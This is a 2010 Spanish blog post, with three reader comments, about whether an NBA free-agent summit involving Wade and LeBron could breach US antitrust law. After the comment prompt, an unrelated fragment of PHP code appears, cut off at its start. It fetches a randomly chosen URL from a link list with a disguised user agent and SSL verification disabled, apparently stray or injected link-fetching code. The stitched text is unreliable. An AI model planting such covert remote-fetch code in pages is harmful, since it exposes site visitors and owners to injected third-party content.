Wade, the Big Brother is watching you

28 de May de 2010 por Jose_Dantley

Traemos hoy una curiosidad deportivo-legal con consecuencias no tan curiosas para sus protagonistas. El verano se presenta muy caliente. LeBron James y Dwayne Wade son los agentes libres que más posibilidades tienen de cambiar una franquicia, pero Chris Bosh, Amare Stoudemire, Joe Johnson o Carlos Boozer –descartamos a Josh Smith por su más que alta probabilidad de permanecer en Atlanta- son mucho más que complementos para potenciales aspirantes al anillo.

Wade se ha descolgado con unas declaraciones en las que sugiere que habrá una cumbre entre los grandes agentes libres, probablemente James, Bosh, Johnson y el propio Wade, para discutir que es lo mejor para todos.

Que dicha reunión está programada parece no solo un hecho, sino casi una necesidad para maximizar los ingresos de los citados cuatro jugadores. El dinero y la gloria de LeBron es más probable si le acompaña Wade o Bosh a Chicago que si no lo hacen. Si deciden emparejarse -LeBron&Johnson frente a Wade&Bosh- tendría más sentido si ambos eligieran conferencias distintas para reeditar rivalidades pasadas.

Sin embargo, el agente de Wade se ha apresurado a desmentirlo. ¿Dónde está el problema? Dudamos que las páginas deportivas se hagan eco de esta posibilidad, pero Wade ha sido muy indiscreto. En Estados Unidos –también en Europa- las normas son muy duras respecto a la llamada “colusión”, es decir, la formación de cárteles que acuerdan condiciones o precios. Por ejemplo, si Movistar y Vodafone pactan los precios, se arriesgan a una multa. Si Wade y LeBron se ponen de acuerdo, se enfrentan a la Sherman Act, una dura ley antitrust que afecta no sólo a empresas sino también a personas físicas.

Económicamente hablando cada cual puede pensar lo que entienda oportuno, pero legalmente –podemos estar o no de acuerdo- Dwayne Wade podría recibir alguna inoportuna visita del Gran Hermano americano. Y si la recibe le puede costar hasta 1 millón de dólares e incluso un paseo por una prisión federal. Quizá su agente llegó demasiado tarde.

En estas circunstancias, las probabilidades de ver a Wade con otra superestrella han disminuído. Todo dependerá de la valoración de riesgos que su agente y sus abogados realicen.

Comenta

3 comentarios a esta entrada

  1. Txusma dice:
    #1

    Y yo q pensaba q estas cosas no pasaban en un libre mercado… Pactar precios! Imposible! 😀

    Se le puede caer el pelo al bueno de Wade. De hecho me parece muy feo esto que están haciendo. Se acerca mucho a adulterar la competición, no?

      Citar

  2. Dantley2 dice:
    #2

    Claro que pasa, los bienes escasos siempre son caros ¡¡¡ Pero discusiones de libre mercado aparte que las dejaremos para otros foros, en este caso no es Stern el que los vigila, porque vete tú a saber lo que Stern prefiere -imagino que a LeBron y otra superestrella en NY y a Wade en Chicago o al revés-, es el gobierno federal.

      Citar

  3. Vader dice:
    #3

    Me parece una tonteria que ni siquiera se intente controlar este tema o hacer creer al respetable que estas cosas no suceden… Porque vamos a ver como se puede impedir que estos 4 hablen por telefono entre ellos o incluso en videoconferencia desde su casa y se pogan 2, 3 o los 4 de acuerdo para fichar por un equipo u otro.

    Estoy seguro que si por ejemplo cualquiera de los 4 dice mañana que quiere fichar por los Bulls habra muchas más posibilidades que los otros 3 quieran ir tambien a los Bulls.

    Los jugadores quieren ganar el máximo posible pero a estos niveles lo que tambien quieren es poder competir por el anillo y este verano más de uno aprovechara para ponerse de acuerdo con otro all-star para ir juntos a la franquicia que más garantias les den de hacer un buen equipo.

    Sigo pensando que Lebron no creo que se mueva. Con Wade ya tengo más dudas, depende de lo que puedan fichar los Heat se quedara o no. Y Bosh, Stoudemire, Boozer y Johnson creo que si que cambiaran de equipo. Los movimientos de estos 4 últimos pueden marcar la decisión final de Wade o incluso de Lebron.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>